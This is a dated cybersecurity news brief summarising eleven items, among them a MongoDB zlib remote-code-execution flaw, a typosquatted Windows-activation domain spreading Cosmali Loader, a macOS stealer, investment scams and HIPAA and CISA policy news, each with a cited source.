Svoboda Cybersecurity Brief December 25, 2025

Singing River Health System shuts down patient records access due to cyber incident

Singing River Health System in Mississippi proactively shut down access to patient medical records and MyChart after detecting a potential cyberattack. The health system, previously breached by Rhysida in 2023 (affecting 900,000 patients), has not confirmed a breach or attributed the incident to a threat actor.
Source: DataBreaches.net

MongoDB warns of critical RCE flaw (CVE-2025-14847) affecting multiple versions

A high-severity vulnerability in MongoDB allows unauthenticated RCE due to improper handling of zlib compression. Affected versions include MongoDB 8.2.0-8.2.3, 8.0.0-8.0.16, and older unsupported versions (4.4.0-4.4.29).
Impact: Remote code execution leading to potential server compromise.
Mitigation: Upgrade to patched versions (8.2.3, 8.0.17, etc.) or disable zlib compression.
Source: BleepingComputer

FBI seizes domain storing stolen US bank credentials

The FBI seized “web3adspanels.org,” a domain hosting bank login credentials stolen via phishing ads on Google/Bing. The scheme caused $14.6M in losses (attempted: $28M) and targeted 19+ US victims.
Source: BleepingComputer

Fake MAS Windows activation domain delivers Cosmali Loader malware

A typosquatted domain (“get.activate[.]win”) mimicking the legitimate Microsoft Activation Scripts (MAS) tool distributed PowerShell malware (Cosmali Loader), which deploys cryptominers and XWorm RAT.
Impact: System compromise via malicious payloads.
Mitigation: Verify command sources, avoid retyping commands, and use sandbox testing.
Source: BleepingComputer

MacSync macOS stealer abuses signed app to bypass Gatekeeper

A new MacSync variant (rebranded Mac.c stealer) was distributed via a notarized Swift app (“zk-call-messenger-installer-3.9.2-lts.dmg”) with evasion tactics like inflated DMG size (25.5MB) and encoded scripts.
Impact: Data theft and RAT capabilities.
Mitigation: Verify app signatures, avoid untrusted downloads.
Source: The Hacker News

Nomani investment scam surges 62% using AI deepfake ads

ESET reported a 62% rise in Nomani scam campaigns using AI-generated videos and fake social media ads (64,000+ blocked URLs). Victims are lured into fake crypto investments and later extorted.
Source: The Hacker News

Pro-Russian hackers claim DDoS attack on French postal service

Noname057(16) targeted La Poste, disrupting package tracking and online payments during peak season. The group is linked to previous attacks on NATO and French government sites.
Source: SecurityWeek

SEC charges $14M crypto scam using fake AI investment tips

Fraudsters impersonated financial professionals on WhatsApp, promoting fake AI trading platforms (Morocoin, Berge, Cirkor) and fictitious “Security Token Offerings.” Victims lost $14M via offshore transfers.
Source: The Hacker News

Healthcare industry pushes back on HIPAA Security Rule overhaul

100+ organizations, led by CHIME, oppose proposed HIPAA updates citing “unreasonable deadlines” and financial burdens. Changes include mandatory MFA, network segmentation, and compliance audits.
Source: DataBreaches.net

Italy fines Apple $116M over restrictive ATT privacy rules

Italy’s AGCM ruled Apple’s App Tracking Transparency framework unfairly burdens third-party developers with double consent prompts, disadvantaging ad-dependent apps. Apple plans to appeal.
Source: The Hacker News

CISA loses PRNI lead amid forced reassignment

David Stern, architect of CISA’s Pre-Ransomware Notification Initiative, resigned after refusing a transfer to FEMA. The program alerts organizations to imminent ransomware attacks.
Source: DataBreaches.net

Share this brief: https://svo.bz/w2RX